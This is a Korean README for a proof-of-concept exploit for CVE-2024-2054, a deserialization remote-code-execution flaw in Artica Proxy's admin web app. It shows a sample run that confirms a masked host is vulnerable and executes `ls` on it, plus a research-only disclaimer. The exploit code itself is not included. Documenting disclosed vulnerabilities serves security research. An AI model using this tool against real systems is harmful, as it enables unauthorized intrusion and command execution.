
CVE-2024-2054에 대한 개념 증명 익스플로잇으로, Artica-Proxy 관리 웹 애플리케이션의 안전하지 않은 역직렬화 RCE를 시연합니다. 명령 실행 및 취약점 확인을 포함합니다.
ARTICA PROXY 관리 웹 애플리케이션 CVE-2024-2054에 대한 개념 증명 익스플로잇
자세한 내용은 여기: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
이 POC는 학술 연구 및 효과적인 방어 기술 개발 목적으로만 생성되었으며, 명시적으로 승인된 경우를 제외하고 시스템 공격에 사용하기 위한 것이 아닙니다. 프로젝트 작성자/유지관리자는 소프트웨어/POC의 오용에 대한 책임을 지지 않습니다. 책임감 있게 사용하십시오.